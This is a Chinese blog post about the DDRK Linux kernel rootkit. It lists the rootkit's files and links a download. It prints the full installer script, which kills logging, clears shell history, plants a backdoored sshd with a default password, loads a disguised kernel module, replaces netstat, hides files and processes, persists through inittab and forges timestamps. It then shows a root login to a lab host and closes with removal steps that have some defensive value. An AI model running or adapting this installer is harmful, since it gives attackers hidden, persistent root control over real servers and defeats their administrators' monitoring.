linux整理

linux:rootkit-ddrk攻击获得root权限以及清除

2017-11-20  本文已影响22人  随风化作雨

DDRK是一个Linux结合shv和adore-ng优点,内核级别的rootkit。

DDRK中包含的文件:

netstat  #替换系统中的netstat,从ssh配置文件中读取端口并隐藏
rk.ko  #内核模块,实现文件和进程的隐藏功能
setup  #rootkit安装文件
tty  #ava工具

bin.tgz

         ---ttymon

         ---sshd.tgz

                   ---.sh

                            ---shdcf2  #sshd配置文件

                            ---shhk

                            ---shhk.pub

                            ---shrs

                            ---sshd  #sshd主程序

DDRK下载地址:http://pan.baidu.com/s/1qWkchlU

因此只要把这些文件上传到服务器上并成功运行,就可以获得该服务器的root权限。为所欲为,无所不能。

setup内容如下:

#!/bin/bash  
##########define variables##########  
DEFPASS=123456    //默认密码  
DEFPORT=43958    //默认端口  
BASEDIR=`pwd`  
SSHDIR=/lib/libsh.so  
HOMEDIR=/usr/lib/libsh  
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE  
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin  
##########check is root##########  
  
if [ "$(whoami)" != "root" ]; then  
  
   echo "BECOME ROOT AND TRY AGAIN"  
   echo ""  
  exit  
fi  
##########extract all tar##########  
tar zxf bin.tgz  
cd bin  
tar zxf sshd.tgz  
rm -rf ./sshd.tgz  
cd $BASEDIR  
rm -rf bin.tgz  
cd $BASEDIR  
##########kill syslogd##########  
killall -9 syslogd >/dev/null 2>&1  
sleep 2  
##########remove sh.conf##########  
if [ -f /etc/sh.conf ]; then  
  rm -rf /etc/sh.conf         //经过md5sum加密过的密码文件  
fi  
##########initialize sshd configuration##########  
if test -n "$1" ; then  
   echo "Using Password : $1"  
   cd $BASEDIR/bin  
   echo -n $1|md5sum > /etc/sh.conf  
else  
   echo "No Password Specified, using default - $DEFPASS"  
   echo -n $DEFPASS|md5sum > /etc/sh.conf  
  
fi  
touch -acmr /bin/ls /etc/sh.conf  
chown -f root:root /etc/sh.conf  
if test -n "$2" ; then  
   echo "Using ssh-port : $2"  
   echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config  
   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2  
   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf  
else  
   echo "No ssh-port Specified, using default - $DEFPORT"  
   echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config  
   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2  
   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf  
fi  
###########creating dirs##########  
SSHDIR=/lib/libsh.so  
HOMEDIR=/usr/lib/libsh  
if [ -d /lib/libsh.so ]; then  
   rm -rf /lib/libsh.so  
fi  
if [ -d /usr/lib/libsh ]; then  
  
   rm -rf /usr/lib/libsh/*  
fi  
mkdir $SSHDIR  
touch -acmr /bin/ls $SSHDIR  
mkdir $HOMEDIR  
touch -acmr /bin/ls $HOMEDIR  
cd $BASEDIR/bin  
mv .sh/* $SSHDIR/  
mv .sh/.bashrc $HOMEDIR  
if [ -f /sbin/ttyload ]; then  
   chattr -AacdisSu /sbin/ttyload  
   rm -rf /sbin/ttyload  
fi  
if [ -f /usr/sbin/ttyload ]; then  
   rm -rf /usr/sbin/ttyload  
fi  
if [ -f /sbin/ttymon ]; then  
  
   rm -rf /sbin/ttymon  
  
fi  
  
   
  
mv $SSHDIR/sshd /sbin/ttyload  
  
chmod a+xr /sbin/ttyload  
  
chmod o-w /sbin/ttyload  
  
touch -acmr /bin/ls /sbin/ttyload  
  
kill -9 `pidof ttyload` >/dev/null 2>&1  
  
   
  
mv $BASEDIR/bin/ttymon /sbin/ttymon  
  
chmod a+xr /sbin/ttymon  
  
touch -acmr /bin/ls /sbin/ttymon  
  
kill -9 `pidof ttymon` >/dev/null 2>&1  
  
   
  
cp /bin/bash $SSHDIR  
#########modify inittab##########  
cp /etc/inittab /etc/.inittab  
sed -e s@^1:2345@0:2345:once:/usr/sbin/ttyload &@ /etc/inittab > /etc/.inittab  
touch -acmr /etc/inittab /etc/.inittab  
mv -f /etc/.inittab /etc/inittab  
echo "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyload  
echo "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyload  
echo "${HOMEDIR}/tty i `pidof ttyload` > /dev/null 2>&1" >> /usr/sbin/ttyload  
echo "${HOMEDIR}/tty i `pidof ttymon` > /dev/null 2>&1" >> /usr/sbin/ttyload  
touch -acmr /bin/ls /usr/sbin/ttyload  
chmod 755 /usr/sbin/ttyload  
/usr/sbin/ttyload > /dev/null 2>&1  
touch -amcr /bin/ls /etc/inittab  
##########make sure inittab has modified##########  
if [ ! "`grep ttyload /etc/inittab`" ]; then  
   echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART "  
   echo "# inittab shuffling probly fucked-up ! "  
fi  
##########load rk.ko##########  
cd $BASEDIR  
modprobe -r ehci-hcd  
mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko  
modprobe ehci-hcd  
mv tty $HOMEDIR  
##########replace netstat##########  
touch -acmr /bin/netstat netstat  
mv -f netstat /bin/netstat  
##########hide all files and process##########  
$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1  
$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1  
$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1  
$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1  
$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1  
$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1  
$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1  
$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1  
##########load rk.ko on boot##########  
cat > /etc/sysconfig/modules/ehci.modules << EOF  
#!/bin/sh  
#install usb modules support  
modprobe -r ehci-hcd  
modprobe ehci-hcd  
EOF  
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules  
chmod 755 /etc/sysconfig/modules/ehci.modules  
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1  
##########check iptables setting##########  
if [ -f /sbin/iptables ]; then  
   echo "`/sbin/iptables -L INPUT | head -5`"  
else  
   echo ""  
   echo "# lucky for u no iptables found"  
fi  
##########start syslogd##########  
/sbin/syslogd -m 0  
 <span style="font-family: 宋体; text-indent: 2em; background-color: rgb(255, 255, 255);"> </span>  
# ./setup 123 3333    //设置密码为123,端口号为3333

Using Password : 123

Using ssh-port : 3333

Chain INPUT (policy ACCEPT)

target     prot opt source               destination

隐藏效果查看:

查看进程

# ps -ef | egrep -i "ttyload|ttymon"

root     24761 17990  0 13:29 pts/2    00:00:00 egrep -i ttyload|ttymon

查看端口

# netstat -ntplu

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name

tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2117/hpiod

-                   tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      2267/mysqld

tcp        0      0 0.0.0.0:43958               0.0.0.0:*                   LISTEN      -

tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2134/cupsd

tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2295/sendmail: acce

tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2122/python

udp        0      0 0.0.0.0:32768           0.0.0.0:*                           2417/avahi-daemon:

udp        0      0 0.0.0.0:68              0.0.0.0:*                           19752/dhclient

udp        0      0 0.0.0.0:5353            0.0.0.0:*                           2417/avahi-daemon:

udp        0      0 0.0.0.0:631             0.0.0.0:*                           2134/cupsd

查看加载模块

# lsmod | grep -i ehci-hcd

查看rootkit相关文件

# ls -dl /lib/libsh.so  /usr/lib/libsh  /etc/sh.conf  /sbin/ttyload  /sbin/ttymon    /bin/ttymon /usr/sbin/ttyload

ls: /bin/ttymon: No such file or directory

-rw-r--r-- 1 2618748389 4063569279     36 Nov 28  2006 /etc/sh.conf

drwxr-xr-x 2 2618748389 4063569279   4096 May 11 13:28 /lib/libsh.so

-rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28  2006 /sbin/ttyload

-rwxrwxr-x 1 2618748389 4063569279  93476 Nov 28  2006 /sbin/ttymon

drwxr-xr-x 2 2618748389 4063569279   4096 May 11 13:28 /usr/lib/libsh

-rwxr-xr-x 1 2618748389 4063569279    171 Nov 28  2006 /usr/sbin/ttyload

查看/etc/inittab文件

# Run gettys in standard runlevels

0:2345:once:/usr/sbin/ttyload

1:2345:respawn:/sbin/mingetty tty1

2:2345:respawn:/sbin/mingetty tty2

3:2345:respawn:/sbin/mingetty tty3

4:2345:respawn:/sbin/mingetty tty4

5:2345:respawn:/sbin/mingetty tty5

6:2345:respawn:/sbin/mingetty tty6

验证:

已攻破并成功执行的主机IP为:192.168.27.129

从另一台登录192.168.27.129,密码为123,端口号为3333

[root@localhost ~]# ssh 192.168.27.129 -p 3333

[root@192.168.27.129s](mailto:root@192.168.27.129s) password:

Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1

[sh]  w.e.l.c.o.m.e

[sh]  To The DoDos Rootkit

[root@DoDo:/root]# 

[root@DoDo:/root]# env

TERM=xterm

SHELL=/bin/bash

SSH_CLIENT=192.168.27.130 38824 3333

SSH_TTY=/dev/pts/3

USER=root

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:

mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.

csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:

*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp

=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:

MAIL=/var/spool/mail/root

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.

PWD=/root

MACHINE=DoDo

PS1=[33[0;36m][$ID@[33[1;37m]$MACHINE[33[0m][33[0;36m]:${PWD}]#[33[0m]

SHLVL=1

HOME=/usr/lib/libsh

ID=root

LOGNAME=root

_=/bin/env

至此,就可以完全控制192.168.27.129了。

到192.168.27.129上查看登录用户:

# w

 13:40:55 up  3:40,  0 users,  load average: 1.23, 0.93, 0.77

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

只有本地用户。

清除方法:

# cd /usr/lib/libsh

# modprobe -r ehci-hcd

# ./tty u /etc/sysconfig/modules/ehci.modules

Checking for adore  0.12 or higher ...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

# rm -rf /etc/sysconfig/modules/ehci.modules

# rm -rf /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko

 # ./tty u /etc/sh.conf

Checking for adore  0.12 or higher ...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

#  ./tty u /lib/libsh.so

Checking for adore  0.12 or higher ...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

#  ./tty u /sbin/ttyload

Checking for adore  0.12 or higher ...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

# ./tty u /usr/sbin/ttyload

Checking for adore  0.12 or higher ...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

#  ./tty u /sbin/ttymon

Checking for adore  0.12 or higher ...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

# rm -rf /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon

# rm –rf /bin/netstat

# vim /etc/inittab 去掉0:2345:once:/usr/sbin/ttyload

其实,还应该检查系统漏洞在何处,以绝后患。

上一篇下一篇

猜你喜欢

热点阅读